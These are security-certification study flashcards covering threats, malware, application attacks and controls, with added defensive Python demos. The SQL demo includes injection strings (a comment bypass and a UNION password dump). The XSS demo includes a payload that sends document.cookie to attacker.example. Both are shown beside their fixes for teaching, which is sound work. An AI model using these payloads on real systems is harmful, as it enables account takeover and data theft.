Confidentiality (CIA Triad)
Only authorized users have access
Control = Encryption (Ex: encrypting files in transit)
Integrity (CIA Triad)
Data is correct and unaltered
Control = Hashing/Digital Signature (Ex: File hash verification)
Availability (CIA Triad)
Data is accessible to authorized users
Control = Backups, redundancy (Ex: Disaster recovery servers)
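The integrity control above names "file hash verification". The following is an added example, not part of the original card set: it hashes a file in chunks, compares the result with a published SHA-256 digest in constant time, and shows that flipping a single bit makes the check fail. The file contents and the digest are constructed here for the demonstration.

```python
import hashlib
import hmac
import os
import tempfile

# Constructed sample content standing in for a downloaded file.
SAMPLE_CONTENT = b"example-installer v1.0 contents\n"


def sha256_of_file(path: str, chunk_size: int = 65536) -> str:
    """Hash a file in chunks so large files never have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_file_hash(path: str, expected_hex: str) -> bool:
    """True if the file's SHA-256 matches the published digest.

    compare_digest does not leak how many leading characters matched through
    timing; strip/lower tolerate a digest copy-pasted from a checksum file.
    """
    actual = sha256_of_file(path)
    return hmac.compare_digest(actual, expected_hex.strip().lower())


def hash_demo() -> tuple:
    """Write the sample file, verify it, corrupt one bit, verify again."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "installer.bin")
        with open(path, "wb") as fh:
            fh.write(SAMPLE_CONTENT)
        # The digest a vendor would publish alongside the download.
        published = hashlib.sha256(SAMPLE_CONTENT).hexdigest()
        ok_before = verify_file_hash(path, published)

        # Flip a single bit, as a transfer error or a tampering proxy would.
        corrupted = bytearray(SAMPLE_CONTENT)
        corrupted[0] ^= 0x01
        with open(path, "wb") as fh:
            fh.write(bytes(corrupted))
        ok_after = verify_file_hash(path, published)
    return ok_before, ok_after


if __name__ == "__main__":
    print(hash_demo())  # (True, False)
```

Caveat: a hash published on the same server as the download only detects accidental corruption. An attacker who replaces the file can replace the digest too; catching that requires a digital signature made with a key the attacker does not hold.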
Script Kiddies (Threat Actor)
Amateur attackers using prebuilt tools, low skill.
Insiders (Threat Actor)
Employees/contractors (can be malicious or accidental)
State Actors (Threat Actor)
Well-funded attackers with geopolitical goals (ex: SolarWinds supply-chain attack)
Advanced Persistent Threats (APT) (Threat Actor)
Skilled, well-funded, long-term stealthy attacks targeting high-value assets.
Hacktivists (Threat Actor)
Ideology-driven attackers
(Ex: defacing company website for activism)
Competitors (Threat Actor)
Steal things like trade secrets or customer lists for business advantage
Brokers (Threat Actor)
Discover vulnerabilities and sell them on the black market.
Shadow IT (Threat Actor)
Employees using unauthorized apps/devices outside IT's control, creating unmanaged and unmonitored weak points.
Platform Vulnerabilities
OS flaws, legacy systems, hardware weaknesses
Configuration Vulnerabilities
Weak passwords, open ports, insecure protocols.
Third-Party Vulnerabilities
Risks from contractors, vendors, supply chain access.
Patch Vulnerabilities
Delays or improper implementation of security updates.
Zero-Day Vulnerabilities
Vulnerabilities unknown to the vendor (so no patch exists) that attackers exploit before they are discovered and fixed.
Email Attack Vector
Phishing, malware attachments
Wireless Attack Vector
Packet sniffing, file interception
Removable Media Attack Vector
USB drops with malware
Direct Access Attack Vector
Tailgating, physical tampering
Social Media Attack Vector
Impersonation, intel gathering
Supply Chain Attack Vectors
Pre-infected hardware, compromised vendors
Cloud Attack Vectors
Misconfigured storage, exposed sensitive files
Main Psychological Principles behind Social Engineering
(An Inside Cook Scams Us Fast w/ Tricks)
Authority, Intimidation, Consensus, Scarcity, Urgency, Familiarity, Trust.
Phishing (Social Engineering)
Mass scam emails
Spear Phishing (Social Engineering)
Targeted phishing at specific individuals
Whaling (Social Engineering)
Phishing aimed at executives
Vishing (Social Engineering)
Fraudulent phone calls
Smishing (Social Engineering)
Fraudulent text messages
Business Email Compromise (BEC) (Social Engineering)
Fake invoices/Payment scams
Physical methods of Social Engineering
Dumpster diving, Tailgating, USB drops, Shoulder surfing
Advanced Social Engineering Methods
AI-enabled deepfakes, fake voices
Typo-Squatting (Social Engineering)
Lookalike domain names (victoriasecret.com, with one "s", instead of the real website victoriassecret.com)
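A practical check for the typo-squatting card above, added here as an example rather than taken from the original material: it flags domains within a small edit distance of a protected brand, and domains that embed the brand name in a different registrable name (paypal-login.com, paypal.com.evil.net). The brand list is constructed; internationalized (punycode) domains are not handled, which is an assumption of this example.

```python
import unicodedata

# Constructed list of brand domains the organisation wants to protect.
BRANDS = ["victoriassecret.com", "paypal.com", "microsoft.com"]


def levenshtein(a: str, b: str) -> int:
    """Edit distance: minimum insertions, deletions and substitutions turning a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def normalize(domain: str) -> str:
    """Lower-case, fold compatibility characters, drop a trailing dot and a leading 'www.'."""
    d = unicodedata.normalize("NFKC", domain.strip().lower()).rstrip(".")
    return d[4:] if d.startswith("www.") else d


def lookalike_of(domain: str, brands=BRANDS, max_distance: int = 2):
    """Return the brand a domain imitates, or None if it is a brand itself or unrelated."""
    d = normalize(domain)
    if d in brands:
        return None  # the genuine domain
    first_label = d.split(".")[0]
    for brand in brands:
        if levenshtein(d, brand) <= max_distance:
            return brand  # one or two typos away: paypa1.com, victoriasecret.com
        if brand.split(".")[0] in first_label:
            return brand  # brand embedded in another name: paypal-login.com
    return None


if __name__ == "__main__":
    for candidate in ["victoriasecret.com", "paypa1.com", "paypal.com.evil.net", "www.paypal.com"]:
        print(candidate, "->", lookalike_of(candidate))
```

Edit distance catches typos and single-character swaps; the label check catches the "brand plus extra words" pattern that distance misses. Both produce false positives on long lists, so in practice the output feeds a review queue or a newly-registered-domain feed rather than blocking outright.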
Pharming (Social Engineering)
Redirecting victims to spoofed website
Malware-based (the victim's hosts file is edited so the hostname resolves to the attacker's IP)
DNS-based (the DNS server's records or cache are poisoned, redirecting every user of that resolver)
Watering Hole Attack (Social Engineering)
Infecting a website commonly visited by a target group
Masking (Data Protection Control)
Hiding sensitive data elements (ex: SSN → ***1234).
Tokenization (Data Protection Control)
Replacing sensitive data with meaningless tokens (credit cards, SSNs).
Encryption (Data Protection Control)
Mathematical scrambling using keys.
Minimization (Data Protection Control)
Collecting only necessary data.
Segmentation (Data Protection Control)
Splits a database into smaller parts to limit access and contain breaches
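The masking and tokenization cards describe two controls that are easy to confuse. This added example (not from the original card set) implements both: a mask that keeps only the last four characters, and a token vault that swaps a value for a random token and only hands the value back to an authorized role. The card number and the role names are constructed for the demonstration.

```python
import secrets


def mask(value: str, visible: int = 4, mask_char: str = "*") -> str:
    """Masking: keep only the last `visible` characters of the identifier.

    Separators are dropped so '123-45-6789' and '123456789' mask identically.
    """
    chars = "".join(ch for ch in value if ch.isalnum())
    hidden = max(len(chars) - visible, 0)
    return mask_char * hidden + chars[hidden:]


class TokenVault:
    """Tokenization: swap a sensitive value for a random token and keep the mapping
    inside the vault. The token is not derived from the value (not a hash, not
    ciphertext), so nothing outside the vault can recover the value from it. A hash
    would not do: SSNs and card numbers have little entropy and are brute-forceable.
    """

    def __init__(self, authorized_roles=("payments",)):
        self._value_by_token = {}
        self._token_by_value = {}
        self._authorized_roles = set(authorized_roles)

    def tokenize(self, value: str) -> str:
        if value in self._token_by_value:
            return self._token_by_value[value]  # same value, same token, so records still join
        while True:
            token = "tok_" + secrets.token_hex(8)
            if token not in self._value_by_token:
                break
        self._value_by_token[token] = value
        self._token_by_value[value] = token
        return token

    def detokenize(self, token: str, role: str) -> str:
        if role not in self._authorized_roles:
            raise PermissionError(f"role {role!r} may not detokenize")
        return self._value_by_token[token]


def tokenization_demo() -> dict:
    """Store a card number tokenized, show it masked, and check who may detokenize."""
    vault = TokenVault()
    card = "4111 1111 1111 1111"  # constructed test number, not a real account
    token = vault.tokenize(card)
    try:
        vault.detokenize(token, role="support")
        support_can_read = True
    except PermissionError:
        support_can_read = False
    return {
        "token": token,
        "same_value_same_token": vault.tokenize(card) == token,
        "display": mask(card),
        "support_can_read": support_can_read,
        "payments_reads": vault.detokenize(token, role="payments"),
    }


if __name__ == "__main__":
    print(tokenization_demo())
```

Everything outside the vault (the order database, logs, support tooling) stores only the token and the masked form; the plaintext lives in one place whose access is audited. That is what lets a breach of the main database leak nothing usable.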
Virus (Malware)
Attaches to a host file or program and needs user action (opening or running it) to spread.
Worm (Malware)
Self-spreads via networks.
Polymorphic Virus (Malware)
Mutates to evade detection.
Trojan (Malware)
Malicious software disguised as legitimate software.
RAT (Remote Access Trojan) (Malware)
Trojan with remote control capability.
Ransomware (Malware)
Encrypts files, demands payment for decryption (ex: WannaCry).
Logic Bomb (Malware)
Malicious code triggered by time/event.
Rootkit (Malware)
Hides in the OS to avoid detection and give attackers privileged control.
Spyware (Malware)
Collects info; keyloggers record keystrokes.
Backdoor (Malware)
Hidden entry point (left by a developer or planted by malware) that lets an attacker bypass normal authentication.
Buffer Overflow (Software & Application Attacks)
Input written past the end of a fixed-size buffer overwrites adjacent memory (e.g. a return address), causing a crash or attacker-controlled code execution.
Integer Overflow (Software & Application Attacks)
An arithmetic result exceeds the type's range and wraps around, so a size or bounds check passes with a value that is actually too large.
Improper Input/Exception Handling (Software & Application Attacks)
Reveals system errors or info.
SQL Injection (Software & Application Attacks)
Malicious queries steal/modify database data.
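The SQL injection card above, worked through as an added example (not from the original material) against an in-memory SQLite table with constructed rows: the string-formatted login query can be bypassed with a comment or an always-true condition, and the string-formatted search can be turned into a data dump with UNION, while the parameterized versions treat the same input as plain data.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory table with constructed rows. Passwords are plaintext only so the
    injection stays visible; a real system stores salted password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "correct horse battery"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """Builds SQL by string formatting: input becomes part of the query grammar."""
    query = (
        f"SELECT 1 FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username: str, password: str) -> bool:
    """Parameterized query: values travel separately from the SQL text, so a quote
    in the input can never close the string literal."""
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def search_vulnerable(conn, term: str) -> list:
    """Same flaw used for data theft rather than bypass."""
    query = f"SELECT username FROM users WHERE username LIKE '%{term}%'"
    return [row[0] for row in conn.execute(query).fetchall()]


def search_safe(conn, term: str) -> list:
    """The wildcard is added to the parameter, never to the SQL text."""
    query = "SELECT username FROM users WHERE username LIKE ?"
    return [row[0] for row in conn.execute(query, (f"%{term}%",)).fetchall()]


if __name__ == "__main__":
    db = make_demo_db()
    print(login_vulnerable(db, "alice' --", "wrong"))   # True: comment drops the password check
    print(login_safe(db, "alice' --", "wrong"))         # False
    print(search_vulnerable(db, "x' UNION SELECT password FROM users --"))  # passwords leak
    print(search_safe(db, "x' UNION SELECT password FROM users --"))        # []
```

The `--` starts an SQL comment, so everything after the attacker's quote is discarded; the UNION payload only works because the injected SELECT returns the same number of columns as the original, which is why attackers probe column counts first.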
XSS (Cross-Site Scripting) (Software & Application Attacks)
Injects malicious scripts into pages that other users' browsers then execute.
Types of XSS (Software & Application Attacks)
Stored (in database, permanent)
Reflected (payload in the request, e.g. a URL parameter, echoed back in the response; non-persistent)
DOM-based (client-side script manipulation)
XSS impacts (Software & Application Attacks)
Cookie theft, session hijack, malware injection.
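The XSS cards above name the attack and its impacts; this added example (not from the original card set) shows the defence at the point where untrusted text is rendered: HTML-encoding for the element-body context, and scheme allow-listing for the URL context, where encoding alone does not stop a `javascript:` link. The attacker comment is constructed; a real application gets this from a templating engine with autoescaping rather than hand-written functions.

```python
import html
from urllib.parse import urlparse

# Constructed stored-XSS payload: submitted once, served to every visitor of the page.
ATTACKER_COMMENT = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_unsafe(comment: str) -> str:
    """Pastes user text straight into the page: the browser sees a real <script> tag."""
    return f'<p class="comment">{comment}</p>'


def render_safe(comment: str) -> str:
    """HTML-encodes for the element-body context: '<' becomes '&lt;' and is displayed, not run."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def safe_href(url: str) -> str:
    """URL context: allow only http(s), then encode for the attribute. Encoding alone
    would leave javascript:alert(1) intact because it contains no special characters."""
    cleaned = url.strip()
    if urlparse(cleaned).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(cleaned, quote=True)


def render_link_safe(url: str, text: str) -> str:
    return f'<a href="{safe_href(url)}">{html.escape(text, quote=True)}</a>'


def has_live_script(rendered: str) -> bool:
    """Crude check for the demonstration: would a browser parse a <script> element here?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_unsafe(ATTACKER_COMMENT))
    print(render_safe(ATTACKER_COMMENT))
    print(render_link_safe("javascript:alert(document.cookie)", "click me"))
```

The cookie-theft payload shown is exactly what the HttpOnly cookie attribute blunts: even when the script runs, `document.cookie` no longer contains the session cookie.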
CSRF (Cross-Site Request Forgery) (Software & Application Attacks)
Tricks a logged-in user's browser into sending a state-changing request the attacker chose; the browser attaches the victim's session cookie automatically.
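The CSRF card above, with the standard server-side defence as an added example (not from the original material): a synchronizer token stored in the session and embedded in the site's own forms, plus an Origin header check. The site origin, the session shape and the request dictionaries are constructed for the demonstration; in a framework the same checks sit in middleware.

```python
import hmac
import secrets

# Constructed site identity; a real application takes this from configuration.
SITE_ORIGIN = "https://bank.example"
UNSAFE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def issue_csrf_token(session: dict) -> str:
    """Synchronizer token: a random secret kept server-side in the session and embedded
    in the site's own forms. A page on another origin cannot read it."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_check(session: dict, request: dict) -> tuple:
    """Return (allowed, reason) for a request shaped like
    {"method": ..., "headers": {...}, "form": {...}}."""
    if request["method"].upper() not in UNSAFE_METHODS:
        return True, "safe method"  # GET/HEAD must not change state in the first place

    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    origin = headers.get("origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, f"cross-site origin {origin}"  # browsers set Origin; scripts cannot spoof it

    expected = session.get("csrf_token", "")
    supplied = request.get("form", {}).get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or wrong csrf token"
    return True, "ok"


def csrf_demo() -> dict:
    session = {"user": "alice"}
    token = issue_csrf_token(session)
    legit = {"method": "POST", "headers": {"Origin": SITE_ORIGIN},
             "form": {"to": "bob", "amount": "10", "csrf_token": token}}
    # Form auto-submitted from attacker.example: the browser attaches alice's session
    # cookie, but the attacker can neither read the token nor control the Origin header.
    forged = {"method": "POST", "headers": {"Origin": "https://attacker.example"},
              "form": {"to": "mallory", "amount": "9999"}}
    forged_no_origin = {"method": "POST", "headers": {},
                        "form": {"to": "mallory", "amount": "9999", "csrf_token": "guess"}}
    return {"legit": csrf_check(session, legit),
            "forged": csrf_check(session, forged),
            "forged_no_origin": csrf_check(session, forged_no_origin)}


if __name__ == "__main__":
    print(csrf_demo())
```

The token check is the primary control; the Origin check and a SameSite cookie attribute are defence in depth, each covering cases the others miss (old clients that omit Origin, or a token leaked through an XSS bug).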
SSRF (Server-Side Request Forgery) (Software & Application Attacks)
Attacker makes a web app request internal resources.
Replay Attack (Software & Application Attacks)
Captured login/authentication packets re-sent.
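The replay card above, as an added example (not from the original card set) of why capturing valid traffic is not enough when the protocol is built properly: each request carries a timestamp and a fresh nonce under an HMAC, and the server rejects stale timestamps, reused nonces and edited fields. The shared key, the message format and the timestamps are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets

# Constructed shared secret; in practice each client has its own key.
SHARED_KEY = b"constructed-demo-key"
WINDOW_SECONDS = 30


def _canonical(user: str, action: str, ts: int, nonce: str) -> bytes:
    """Fixed field order so client and server MAC exactly the same bytes."""
    return f"{user}|{action}|{ts}|{nonce}".encode()


def sign_request(user: str, action: str, ts: int, key: bytes = SHARED_KEY) -> dict:
    """Client side: fresh nonce and timestamp, both covered by the HMAC."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(key, _canonical(user, action, ts, nonce), hashlib.sha256).hexdigest()
    return {"user": user, "action": action, "ts": ts, "nonce": nonce, "mac": mac}


class ReplayProtectedServer:
    def __init__(self, key: bytes = SHARED_KEY, window: int = WINDOW_SECONDS):
        self._key = key
        self._window = window
        self._seen_nonces = set()  # a real deployment expires entries older than `window`

    def verify(self, msg: dict, now: int) -> tuple:
        """Return (accepted, reason). MAC first, so unauthenticated input never touches state."""
        body = _canonical(msg["user"], msg["action"], msg["ts"], msg["nonce"])
        expected = hmac.new(self._key, body, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, msg["mac"]):
            return False, "bad mac"
        if abs(now - msg["ts"]) > self._window:
            return False, "stale timestamp"   # bounds how long a capture stays useful
        if msg["nonce"] in self._seen_nonces:
            return False, "replayed nonce"    # catches replays inside the window
        self._seen_nonces.add(msg["nonce"])
        return True, "accepted"


def replay_demo() -> dict:
    server = ReplayProtectedServer()
    now = 1_700_000_000
    msg = sign_request("alice", "transfer:100", ts=now)
    first = server.verify(msg, now)
    replayed = server.verify(dict(msg), now + 5)     # attacker resends the capture
    tampered = dict(msg, action="transfer:9999")     # attacker edits without the key
    old = sign_request("alice", "transfer:100", ts=now - 600)  # captured ten minutes ago
    return {"first": first,
            "replayed": replayed,
            "tampered": server.verify(tampered, now),
            "old": server.verify(old, now)}


if __name__ == "__main__":
    print(replay_demo())
```

Neither check alone suffices: the timestamp window without nonces still allows replays within the window, and nonces without a timestamp force the server to remember every nonce forever. TLS removes the capture step entirely for traffic in transit, but application-level tokens still need this treatment when they can be obtained from logs or a compromised intermediary.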
Signature-based Antivirus (Endpoint Security)
Detects known threats
Anomaly-based Antivirus (Endpoint Security)
Detects unusual behavior
Browser Protections (Endpoint Security)
HttpOnly (cookie not readable by JavaScript, so XSS cannot steal it),
Secure (cookie only sent over HTTPS),
SameSite (cookie not attached to cross-site requests, blunting CSRF)
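The cookie attributes on the card above, as an added example (not from the original material): one function builds a session `Set-Cookie` value with the protective attributes set, and a second audits any `Set-Cookie` value and lists what is missing, which is the check a reviewer runs against a live site's response headers. The cookie name and session id are constructed.

```python
from http.cookies import SimpleCookie


def build_session_cookie(session_id: str) -> str:
    """Set-Cookie header value with the attributes a session cookie should carry."""
    jar = SimpleCookie()
    jar["session"] = session_id
    morsel = jar["session"]
    morsel["httponly"] = True    # document.cookie cannot read it (limits XSS cookie theft)
    morsel["secure"] = True      # only sent over HTTPS
    morsel["samesite"] = "Lax"   # not attached to cross-site POSTs (blunts CSRF)
    morsel["path"] = "/"
    return morsel.OutputString()


def audit_set_cookie(header_value: str) -> list:
    """Return the protections missing from a Set-Cookie header value.

    SameSite=None is treated as missing: it explicitly allows cross-site sending.
    """
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    attrs = {}
    for part in parts[1:]:              # parts[0] is name=value
        name, _, value = part.partition("=")
        attrs[name.strip().lower()] = value.strip()
    missing = []
    if "httponly" not in attrs:
        missing.append("HttpOnly")
    if "secure" not in attrs:
        missing.append("Secure")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        missing.append("SameSite=Lax or Strict")
    return missing


if __name__ == "__main__":
    good = build_session_cookie("abc123")
    print(good)
    print(audit_set_cookie(good))                        # []
    print(audit_set_cookie("session=abc123; Path=/"))   # all three missing
```

Note the flag is spelled `HttpOnly`; it concerns script access, not HTTPS (that is what `Secure` does). SameSite=Lax still sends the cookie on top-level GET navigations, which is why GET must never change state.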
EDR (Endpoint Detection & Response) (Endpoint Security)
Continuous endpoint telemetry (process, file and network activity), behavioral/anomaly detection, and response actions such as isolating the host or killing a process
Hardening Techniques (Endpoint Security)
Patch management
Sandbox (isolated environment)
Allow/Deny lists (app restrictions)
Close unused ports
Preventative Controls (Risk Controls)
Stop an incident before it happens (ex: firewalls, access controls, locks)
Detective Controls (Risk Controls)
Identify and record an incident while it happens or afterwards (ex: logs, IDS, CCTV)
Corrective Controls (Risk Controls)
Restore systems after an incident (ex: backups, patching, incident response)
Compensating Controls (Risk Controls)
Alternative control used when the primary control is not feasible (ex: extra monitoring and segmentation for a legacy system that cannot be patched)
Deterrent Controls (Risk Controls)
Discourage attackers from attempting an attack (ex: warning signs, visible cameras)
CCTV (Risk Controls)
Deterrent + Detective (visible cameras discourage attempts and record them)
IPS/IDS (Risk Controls)
IDS = Detective (alerts on attacks); IPS = Preventative (sits inline and blocks them)